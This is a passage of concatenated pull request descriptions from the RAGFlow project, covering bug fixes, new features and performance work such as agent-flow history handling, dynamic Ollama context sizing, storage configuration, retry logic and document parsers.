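# File name, file content, separator, and the trailing newline added by the frontend.
query = "question.txt\nHow is the weather today?\n----\n"

lines = query.split("\n")
last_line = lines[-1] if lines else ""
```

Because the input ends with `\n`, the last element of `lines` is always the empty string, which is what the retrieval component ended up searching for.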
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Fix #5418
Actually, the fix in #4329 also works for agent flows with parameters,
so this PR just relaxes the `else` branch of that fix. With this PR, it
works fine on my side, but it may need more testing to make sure it does
not break anything.
I guess the real problem may be deeply hidden in the code which relates
to conversation and canvas execution. After a few hours of debugging, I
see the only difference between with and without parameters in `begin`
component, is the `history` field of canvas data. When the `begin`
component contains some parameters, the debug log shows:
```
025-03-29 19:50:38,521 DEBUG 356590 {
"component_name": "Begin",
"params": {"output_var_name": "output", "message_history_window_size": 22, "query": [{"type": "fileUrls", "key": "fileUrls", "name": "files", "optional": true, "value": "问题.txt\n今天天气怎么样"}], "inputs": [], "debug_inputs": [], "prologue": "你好! 我是你的助理,有什么可以帮到你的吗?", "output": null},
"output": null,
"inputs": []
}, history: [["user", "请回答我上传文件中的问题。"]], kwargs: {"stream": false}
2025-03-29 19:50:38,523 DEBUG 356590 {
"component_name": "Answer",
"params": {"output_var_name": "output", "message_history_window_size": 22, "query": [], "inputs": [], "debug_inputs": [], "post_answers": [], "output": null},
"output": null,
"inputs": []
}, history: [["user", "请回答我上传文件中的问题。"]], kwargs: {"stream": false}
```
Then it does not go further along the flow.
When the `begin` component does not contain any parameter, the debug log
shows:
```
2025-03-29 19:41:13,518 DEBUG 353596 {
"component_name": "Begin",
"params": {"output_var_name": "output", "message_history_window_size": 22, "query": [], "inputs": [], "debug_inputs": [], "prologue": "你好! 我是你的助理,有什么可以帮到你的吗?", "output": null},
"output": null,
"inputs": []
}, history: [], kwargs: {"stream": false}
2025-03-29 19:41:13,520 DEBUG 353596 {
"component_name": "Answer",
"params": {"output_var_name": "output", "message_history_window_size": 22, "query": [], "inputs": [], "debug_inputs": [], "post_answers": [], "output": null},
"output": null,
"inputs": []
}, history: [], kwargs: {"stream": false}
2025-03-29 19:41:13,556 INFO 353596 127.0.0.1 - - [29/Mar/2025 19:41:13] "POST /api/v1/agents/fee6886a0c6f11f09b48eb8798e9aa9b/sessions?user_id=123 HTTP/1.1" 200 -
2025-03-29 19:41:21,115 DEBUG 353596 Canvas.prepare2run: Retrieval:LateGuestsNotice
2025-03-29 19:41:21,116 DEBUG 353596 {
"component_name": "Retrieval",
"params": {"output_var_name": "output", "message_history_window_size": 22, "query": [], "inputs": [], "debug_inputs": [], "similarity_threshold": 0.2, "keywords_similarity_weight": 0.3, "top_n": 8, "top_k": 1024, "kb_ids": ["9aca3c700c5911f0811caf35658b9385"], "rerank_id": "", "empty_response": "", "tavily_api_key": "", "use_kg": false, "output": null},
"output": null,
"inputs": []
}, history: [["user", "请回答我上传文件中的问题。"]], kwargs: {"stream": false}
```
It correctly goes along the flow and generates the correct answer.
You can see the difference: when the `begin` component has any
parameter, the `history` field is filled from the beginning, while it is
just `[]` if the `begin` component has no parameter.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Fix knowledge_graph_kwd on infinity. Close #6476 and #6624
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix entity_types. Close #6287 and #6608
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
This PR gives better control over which services are loaded in each
container. With this approach, we can create containers that run only
the web server and others that run only the task executor. It also
introduces a unique ID per task executor host, which will be important
when scaling task executors horizontally, since unique task executor
IDs will be required.
This new `entrypoint.sh` maintains the default behavior of starting the
web server and task executor on the same host.
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [X] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
# Dynamic Context Window Size for Ollama Chat
## Problem Statement
Previously, the Ollama chat implementation used a fixed context window
size of 32768 tokens. This caused two main issues:
1. Performance degradation due to unnecessarily large context windows
for small conversations
2. Potential business logic failures when using smaller fixed sizes
(e.g., 2048 tokens)
## Solution
Implemented a dynamic context window size calculation that:
1. Uses a base context size of 8192 tokens
2. Applies a 1.2x buffer ratio to the total token count
3. Adds multiples of 8192 tokens based on the buffered token count
4. Implements a smart context size update strategy
## Implementation Details
### Token Counting Logic
```python
def count_tokens(text):
    """Calculate token count for text"""
    # Simple calculation: 1 token per ASCII character
    # 2 tokens for non-ASCII characters (Chinese, Japanese, Korean, etc.)
    total = 0
    for char in text:
        if ord(char) < 128:  # ASCII characters
            total += 1
        else:  # Non-ASCII characters
            total += 2
    return total
```
### Dynamic Context Calculation
```python
def _calculate_dynamic_ctx(self, history):
    """Calculate dynamic context window size"""
    # Calculate total tokens for all messages
    total_tokens = 0
    for message in history:
        content = message.get("content", "")
        content_tokens = count_tokens(content)
        role_tokens = 4  # Role marker token overhead
        total_tokens += content_tokens + role_tokens
    # Apply 1.2x buffer ratio
    total_tokens_with_buffer = int(total_tokens * 1.2)
    # Calculate context size in multiples of 8192
    if total_tokens_with_buffer <= 8192:
        ctx_size = 8192
    else:
        ctx_multiplier = (total_tokens_with_buffer // 8192) + 1
        ctx_size = ctx_multiplier * 8192
    return ctx_size
```
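As a rough worked example of the sizing rule above, the standalone sketch below takes a precomputed token total instead of a message history. The helper name `ctx_size_for` and the two constants are hypothetical names introduced for illustration; they are not part of the PR.

```python
BASE_CTX = 8192      # base context size and growth increment, as described above
BUFFER_RATIO = 1.2   # buffer ratio applied to the raw token count


def ctx_size_for(total_tokens: int) -> int:
    """Hypothetical helper: map a raw token total to a context window size."""
    buffered = int(total_tokens * BUFFER_RATIO)
    if buffered <= BASE_CTX:
        return BASE_CTX
    # Move up to the next multiple of 8192. A buffered count that is already an
    # exact multiple still gains one extra block, matching the logic above.
    return (buffered // BASE_CTX + 1) * BASE_CTX


for tokens in (1000, 7000, 20000):
    print(tokens, ctx_size_for(tokens))
```

With these inputs, a 1000-token conversation stays at the 8192 base, while 7000 tokens crosses the base once the buffer is applied and moves to the next increment.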
### Integration in Chat Method
```python
def chat(self, system, history, gen_conf):
    if system:
        history.insert(0, {"role": "system", "content": system})
    if "max_tokens" in gen_conf:
        del gen_conf["max_tokens"]
    try:
        # Calculate new context size
        new_ctx_size = self._calculate_dynamic_ctx(history)
        # Prepare options with context size
        options = {
            "num_ctx": new_ctx_size
        }
        # Add other generation options
        if "temperature" in gen_conf:
            options["temperature"] = gen_conf["temperature"]
        # Note: never true here, because "max_tokens" was deleted from gen_conf above
        if "max_tokens" in gen_conf:
            options["num_predict"] = gen_conf["max_tokens"]
        if "top_p" in gen_conf:
            options["top_p"] = gen_conf["top_p"]
        if "presence_penalty" in gen_conf:
            options["presence_penalty"] = gen_conf["presence_penalty"]
        if "frequency_penalty" in gen_conf:
            options["frequency_penalty"] = gen_conf["frequency_penalty"]
        # Make API call with dynamic context size
        response = self.client.chat(
            model=self.model_name,
            messages=history,
            options=options,
            keep_alive=60
        )
        return response["message"]["content"].strip(), response.get("eval_count", 0) + response.get("prompt_eval_count", 0)
    except Exception as e:
        return "**ERROR**: " + str(e), 0
```
## Benefits
1. **Improved Performance**: Uses appropriate context windows based on
conversation length
2. **Better Resource Utilization**: Context window size scales with
content
3. **Maintained Compatibility**: Works with existing business logic
4. **Predictable Scaling**: Context growth in 8192-token increments
5. **Smart Updates**: Context size updates are optimized to reduce
unnecessary model reloads
## Future Considerations
1. Fine-tune buffer ratio based on usage patterns
2. Add monitoring for context window utilization
3. Consider language-specific token counting optimizations
4. Implement adaptive threshold based on conversation patterns
5. Add metrics for context size update frequency
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
This PR updates the MySQL container configuration by setting the
parameter --binlog_expire_logs_seconds to 604800 seconds (7 days). This
change ensures that MySQL automatically purges binary logs older than 7
days, helping to conserve disk space and maintain precise log
management.
### What problem does this PR solve?
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Feat: Add RadioGroup component #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: When an Excel cell contains a formula, the parsed result is the
formula itself and cannot be correctly parsed as a value.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: tangyu <1@1.com>
### What problem does this PR solve?
### Type of change
- [x] add test cases
### What problem does this PR solve?
Introduced delete_knowledge_graph
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] Documentation Update
### What problem does this PR solve?
When I use the Categorize operator and the keywords I want to
categorize on appear repeatedly in the input, the operator cannot
determine which keyword appears most frequently. Instead, it simply
returns whichever keyword matches. This PR changes the Categorize
filter to address that.
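One way to read the intended behavior is "pick the category whose keywords occur most often". The sketch below illustrates that reading only; the helper name `pick_category` and the shape of the `categories` mapping are assumptions, not the code in this PR.

```python
from collections import Counter
from typing import Dict, List, Optional


def pick_category(text: str, categories: Dict[str, List[str]]) -> Optional[str]:
    """Hypothetical helper: return the category whose keywords occur most often."""
    lowered = text.lower()
    counts = Counter()
    for name, keywords in categories.items():
        # Sum the occurrences of every keyword that belongs to this category.
        counts[name] = sum(lowered.count(kw.lower()) for kw in keywords)
    if not counts:
        return None
    name, hits = counts.most_common(1)[0]
    return name if hits > 0 else None
```

When no keyword matches at all, the sketch returns `None` so the caller can fall back to a default category.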
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
- [x] Refactoring
- [x] Performance Improvement
### What problem does this PR solve?
Feat: Add logo-with-text-white.svg #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Prevent the application from failing to start because it reads a
missing or incorrect Minio connection configuration when a file storage
backend other than Minio is in use.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
related issue #5882
### What problem does this PR solve?
Update the Helm Infinity image from v0.5.0 to
infiniflow/infinity:v0.6.0-dev3 to resolve issue #5882.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Fix: Translate the flow DB Assistant module to zh
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [x] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
---------
Co-authored-by: Chenzy <chenzy901@gmail.com>
### What problem does this PR solve?
There is a small bug in the update-dataset example in this document.
`rag_object.list_datasets` returns a list, so the first item should be
taken as a `ragflow_sdk.modules.dataset.DataSet` before calling update.
The example is adapted accordingly.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Removed set_entity and set_relation to avoid accessing doc engine during
graph computation.
Introduced GraphChange to avoid writing unchanged chunks.
### Type of change
- [x] Performance Improvement
### What problem does this PR solve?
1. For the /mv API, use get_by_ids to avoid O(n) DB I/O.
2. For /list, remove one unnecessary call.
### Type of change
- [x] Performance Improvement
Added the with_retry decorator in db_models.py to add a retry mechanism
for database operations. Applied the retry mechanism to the lock and
unlock methods of the PostgresDatabaseLock and MysqlDatabaseLock classes
to enhance the reliability of lock operations.
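A minimal sketch of what such a retry decorator might look like. The parameter names `max_retries` and `retry_delay` are assumptions for illustration; the actual `with_retry` in db_models.py may differ in signature and in which exceptions it retries.

```python
import functools
import time


def with_retry(max_retries=3, retry_delay=0.1):
    """Retry the wrapped call on any exception (assumed signature, not the PR's)."""
    def decorator(func):
        @functools.wraps(func)
        def wrapper(*args, **kwargs):
            last_exc = None
            for attempt in range(max_retries):
                try:
                    return func(*args, **kwargs)
                except Exception as exc:
                    last_exc = exc
                    # Sleep between attempts, but not after the final one.
                    if attempt < max_retries - 1:
                        time.sleep(retry_delay)
            raise last_exc
        return wrapper
    return decorator


attempts = {"n": 0}


@with_retry(max_retries=3, retry_delay=0.01)
def acquire_lock():
    """Stand-in for a lock call that fails twice before succeeding."""
    attempts["n"] += 1
    if attempts["n"] < 3:
        raise RuntimeError("failed to acquire lock")
    return True
```

Applied to lock and unlock methods, a decorator of this shape turns a transient failure into a few short retries instead of an immediate exception.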
### What problem does this PR solve?
Resolve the "failed to acquire lock" exception with a retry mechanism.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: wenju.li <wenju.li@deepctr.cn>
### What problem does this PR solve?
Fix: Resolve FlowSetting not reading Title from .ts files
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Enhance Langfuse API: add project_id and project_name
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Currently, if a thinking model (deepseek-r1:32b served by Ollama in my
case) is used in the "Keyword" node, the result includes the entire
<think> block, so the node returns more than just keywords.
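A minimal sketch of stripping the reasoning block before the keywords are used, assuming the model wraps its reasoning in a single `<think>...</think>` pair. The helper name `strip_think` is hypothetical; the PR's actual fix may be implemented differently.

```python
import re

# DOTALL lets "." match newlines, since the think block usually spans several lines.
THINK_BLOCK = re.compile(r"<think>.*?</think>", flags=re.DOTALL)


def strip_think(text: str) -> str:
    """Remove <think>...</think> spans and trim the surrounding whitespace."""
    return THINK_BLOCK.sub("", text).strip()


raw = "<think>\nThe user asks about retrieval...\n</think>\nrag, llm, search"
print(strip_think(raw))
```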
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Improve the logic for fetching the parent folder and remove unnecessary DB I/O.
### Type of change
- [x] Performance Improvement
### What problem does this PR solve?
### Type of change
- [x] update test cases
### What problem does this PR solve?
1. Missing completion delimiter.
2. Missing bracket handling.
3. The doc_ids returned by update_graph is a set, but the insert
operation in extract_community needs a list.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
For batch requests, fetch all files up front with get_by_ids, replacing
the O(n) I/O logic.
### Type of change
- [x] Performance Improvement
### What problem does this PR solve?
Feat: Add LangfuseCard component. #6155
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Langfuse update model has no fields attribute
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: lizheng@ssc-hn.com <lizheng@ssc-hn.com>
### What problem does this PR solve?
Feat: Add background-core-standard to tailwind.css #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Support picture-based bullets for PPT.
Fix one mistake in the documentation.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
When a knowledge base extracts knowledge graphs through an online LLM
API, frequent rate limit errors were triggered, causing document
parsing to fail. This commit fixes the issue by optimizing API calls in
the following way:
Added exponential backoff and jitter to the API call to reduce the
frequency of rate limit errors.
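Exponential backoff with jitter can be sketched as follows. This is an illustration under stated assumptions, not the PR's code: the function names, the default delays, the "full jitter" variant, and the `is_rate_limit` predicate are all hypothetical.

```python
import random
import time


def backoff_delays(max_retries=5, base_delay=1.0, max_delay=30.0):
    """Yield one delay per retry: exponential growth, capped, with full jitter."""
    for attempt in range(max_retries):
        cap = min(max_delay, base_delay * (2 ** attempt))
        yield random.uniform(0, cap)


def call_with_backoff(func, is_rate_limit, max_retries=5, base_delay=1.0, sleep=time.sleep):
    """Call func(), retrying with backoff while is_rate_limit(exc) is true."""
    delays = backoff_delays(max_retries, base_delay)
    while True:
        try:
            return func()
        except Exception as exc:
            delay = next(delays, None)
            # Give up when retries are exhausted or the error is not a rate limit.
            if delay is None or not is_rate_limit(exc):
                raise
            sleep(delay)
```

The jitter spreads retries from concurrent workers over time, so they do not all hit the API again at the same instant.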
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### Address Problem:
The original implementation used re.sub(r"(\\\"|\")", "", content) which
stripped all quotes from the processed content. While this worked for
simple Jinja2-rendered templates, it caused formatting issues when:
- Quotes were required in the final output (e.g., JSON, Python code
strings)
### Solution:
1. Selective JSON Serialization.
2. Removed Global Quote Removal
### What problem does this PR solve?
This PR addresses an issue in template processing where all quotation
marks (" and \") were being removed from content, potentially corrupting
string formatting in rendered outputs. **In fact, the extra quotes are
generated by json.dumps(v, ensure_ascii=False).**
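The source of the extra quotes is easy to reproduce. The sketch below shows it, along with one possible reading of "selective JSON serialization": serialize only non-string values. The helper `render_value` is hypothetical, and the PR's actual rule may differ.

```python
import json


def render_value(value):
    """Serialize only non-string values; strings pass through unquoted (assumed rule)."""
    if isinstance(value, str):
        return value
    return json.dumps(value, ensure_ascii=False)


print(json.dumps("hello", ensure_ascii=False))  # the string gains surrounding quotes
print(render_value("hello"))                     # the string is left untouched
print(render_value({"k": "v"}))                  # a dict is serialized, inner quotes kept
```

With this approach no global quote stripping is needed, so quotes that belong in the output (JSON, code strings) survive.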
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
This PR resolves the issue of multiple top-level packages being detected
in the Python project, which caused errors when using uv pip install.
The problem occurred because the project had multiple package
directories at the root level, leading to a flat-layout error.
To fix this, the pyproject.toml file was updated to explicitly list the
packages using the [tool.setuptools] section. This ensures that the
correct packages are included during installation, avoiding the
flat-layout error.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: If the Transfer item is disabled, the item cannot be edited. #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Adds hierarchical title path tracking for tables in DOCX documents to
improve context association. Previously, extracted tables lacked
positional context within document structure.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix the error where the Ollama embeddings interface returns a “500
Internal Server Error” when using models such as xiaobu-embedding-v2 for
embedding.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- Introduce the `check_duplicate_ids` function in `dataset.py` and
`doc.py` to check for and handle duplicate IDs.
- Update the deletion operation to ensure that when deleting datasets
and documents, error messages regarding duplicate IDs can be returned.
- Implement the `check_duplicate_ids` function in `api_utils.py` to
return unique IDs and error messages for duplicate IDs.
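A minimal sketch of a helper with this contract (unique IDs plus error messages for duplicates). Only the function name comes from the PR; the parameters, return shape, and message wording are assumptions.

```python
from collections import Counter


def check_duplicate_ids(ids, id_type="item"):
    """Return (unique_ids, messages); a sketch, the real signature may differ."""
    counts = Counter(ids)
    # De-duplicate while preserving first-seen order.
    unique_ids = list(dict.fromkeys(ids))
    messages = [f"Duplicate {id_type} ids: {i}" for i, n in counts.items() if n > 1]
    return unique_ids, messages


unique, errors = check_duplicate_ids(["a", "b", "a"], "dataset")
print(unique, errors)
```

The deletion endpoint can then operate on `unique` and include `errors` in its response.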
### What problem does this PR solve?
Close https://github.com/infiniflow/ragflow/issues/6234
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
---------
Co-authored-by: wenju.li <wenju.li@deepctr.cn>
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Feat: Add user registration toggle feature. Added a user registration
toggle REGISTER_ENABLED in the settings and .env config file. The user
creation interface now checks the state of this toggle to control the
enabling and disabling of the user registration feature.
The front-end implementation is done: the registration button does not
appear if registration is not allowed. I tested this on my local server
and it worked smoothly.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
---------
Co-authored-by: wenju.li <wenju.li@deepctr.cn>
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
Fix: Optimized the get_by_id method to resolve the issue of missing
exceptions and improve query performance
### What problem does this PR solve?
Optimized the get_by_id method to resolve the issue of missing
exceptions and improve query performance.
Optimization details:
1. The original method used a custom query method that required
concatenating SQL, which impacted performance.
2. The query method returned a list, which needed to be accessed by
index, posing a risk of index out-of-bounds errors.
3. The original method used except Exception to catch all errors, which
is not a best practice in Python programming and may lead to missing
exceptions. The get_or_none method accurately catches DoesNotExist
errors while allowing other errors to be raised normally.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] Performance Improvement
### What problem does this PR solve?
Call register_scripts on connecting redis
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### Change Content
- A new function `load_env_file` has been added to load environment
variables from a .env file in the current script directory.
- If the .env file exists, the variables within it will be loaded; if it
does not exist, a warning message will be output.
I found this issue while testing this PR:
https://github.com/infiniflow/ragflow/pull/6327. The locally started
server did not read the REGISTER_ENABLED variable from the .env file,
so the value was always the default, True.
### What problem does this PR solve?
When following the README.md tutorial to start from source code, the
base containers (es, redis, etc.) load .env. Therefore,
`launch_backend_service.sh` should also load .env so that its
configuration is consistent with that of the Docker containers.
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
- Fix incorrect progress check condition that prevented re-parsing of
completed documents
- Allow parsing for documents with progress 0.0 (not started) or 1.0
(completed)
- Only block parsing for documents currently in progress (0.0 < progress
< 1.0)
Close #6312
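The corrected condition can be summarized in a few lines. The helper name `can_start_parsing` is hypothetical; only the progress thresholds come from the description above.

```python
def can_start_parsing(progress: float) -> bool:
    """Hypothetical helper: allow parsing unless a run is currently in progress."""
    # 0.0 means not started and 1.0 means completed; both may be (re-)parsed.
    return not (0.0 < progress < 1.0)


for p in (0.0, 0.5, 1.0):
    print(p, can_start_parsing(p))
```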
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Fix: Resolved a bug where sibling components in Canvas were not
restricted to fetching data from the upstream when parallel components
were present.
Issue: When parallel components existed in Canvas, sibling components
incorrectly fetched data without being limited to the upstream scope,
causing data retrieval issues.
Solution: Adjusted the data fetching logic to ensure sibling components
only retrieve data from the upstream scope.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Add fallback for PDF figure parser
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Optimize setting configuration initialization to resolve Minio
initialization error caused by using a specific storage.
Reproduction Scenario:
Using Aliyun OSS as the backend storage with the STORAGE_IMPL
environment variable set to OSS.
The service_conf.yaml.template configuration file contains OSS-related
configurations, while other storage configurations are commented out.
When the service starts, it still attempts to initialize the Minio
storage. Since there is no Minio configuration in
service_conf.yaml.template, it results in an error due to the missing
configuration file.
Optimization Measures:
Automatically determine the required initialization configuration based
on the environment variable.
Do not initialize configurations for unused resources.
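As an illustration of the idea, the sketch below selects only the configuration section named by STORAGE_IMPL. The function name, the shape of `all_conf`, and the `MINIO` default are assumptions; the real settings code may be organized differently.

```python
import os


def select_storage_config(all_conf: dict, env=os.environ) -> dict:
    """Return only the config section for the backend named by STORAGE_IMPL."""
    impl = env.get("STORAGE_IMPL", "MINIO").lower()  # the default is an assumption
    if impl not in all_conf:
        raise KeyError(f"no '{impl}' section configured for STORAGE_IMPL={impl.upper()}")
    # Sections for unused backends are never touched, so they may be absent.
    return {impl: all_conf[impl]}


conf = select_storage_config({"oss": {"bucket": "demo"}}, env={"STORAGE_IMPL": "OSS"})
print(conf)
```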
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Add VLM-boosted PDF parser if VLM is set.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: In the Agent's workflow, the input content cannot contain line
breaks; \n does not work and an error is reported. #6241
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
When using LLM for auto-tag, if there are no examples, the tag format
generated by LLM may be wrong. This will cause Elasticsearch insert
errors. Adding basic examples can avoid this problem.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Alter TreeView component #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add history version save
- Allows users to view and download agent files by version revision
history

### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Blank and createFromNothing were not read from the i18n file when an
Agent was created.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix #5719
Add data type validation for parser_config
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Alter TransferList props #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add vision LLM PDF parser
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
Add support for non-stream responses with session.ask_without_stream and
fix a typo in the Python API doc.
Non-stream responses are needed, especially for command execution, e.g.
text2SQL. The commands have to be completed before the agent is
triggered.
### What problem does this PR solve?
It's to fix the [Issue:
6206](https://github.com/infiniflow/ragflow/issues/6206)
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
---------
Co-authored-by: Howard WU <yuanhao.wu@ifudata.com>
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Feat: Add TreeView component #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Replace the for loop in the create_inputs method with NumPy operations.
### Type of change
- [x] Performance Improvement
### What problem does this PR solve?
This pull request (PR) adds code for parsing PPTX files, aiming to
represent list-formatted text more precisely (list items are indicated by `.`).
### Type of change
- [ ] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [x] Refactoring
- [ ] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
Fix: Fixed the issue that events cannot be triggered after the shadcn-ui
dialog is closed. #3221
Refer to [Combobox in a form in a dialog isn't working.
#1748](https://github.com/shadcn-ui/ui/issues/1748#issuecomment-2720130543)
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Take kb_id into account in Elasticsearch insert, update, and delete. Close #6066
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Resolve document concurrent upload issue. #6039
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Knowledge base page cannot upload folders #6062
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Prevent password boxes other than login passwords from displaying
passwords saved in the browser's password manager by default. #6033
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Change “Document parser” to "PDF parser" #6072
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
AWS Bedrock has made deepseek-r1 available on its serverless inference.
This adds the R1 serverless model for use via the bedrock model
abilities.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
…ions
### What problem does this PR solve?
This PR fixes an issue where the application was repeatedly reading the
llm_factories.json file from disk in multiple places, which could lead
to "Too many open files" errors under high load conditions. The fix
centralizes the file reading operation in the settings.py module and
stores the data in a global variable that can be accessed by other
modules.
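The "read once, share everywhere" idea can be sketched with a cached loader. Note that this uses `functools.lru_cache` rather than the global variable in settings.py described above, and the function name `load_json_once` is hypothetical.

```python
import functools
import json


@functools.lru_cache(maxsize=None)
def load_json_once(path: str) -> dict:
    """Read and parse a JSON file once per path; later calls reuse the result."""
    with open(path, "r", encoding="utf-8") as f:
        return json.load(f)
```

Every caller receives the same dict object, so the file is opened only once per process; callers should treat the result as read-only.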
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [ ] New Feature (non-breaking change which adds functionality)
- [ ] Documentation Update
- [ ] Refactoring
- [x] Performance Improvement
- [ ] Other (please describe):
### What problem does this PR solve?
- The API documentation lacks detailed error code explanations. Added
error code tables to `python_api_reference.md` and
`http_api_reference.md` to clarify possible error codes and their
meanings.
- Error handling in the codebase is inconsistent. Standardized error
handling logic in `sdk/python/ragflow_sdk/modules/chunk.py`.
- Improved API comments by adding standardized docstrings to enhance
code readability and maintainability.
### Type of change
- [x] Documentation Update
- [x] Refactoring
### What problem does this PR solve?
Fix incorrect answer data in chat_completion.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: renqi <renqi08266@fxomail.com>
### What problem does this PR solve?
Optimize OCR garbage identification to reduce unnecessary filtering.
#5713
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Set the default value of Chunk token number to 512 #6016
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
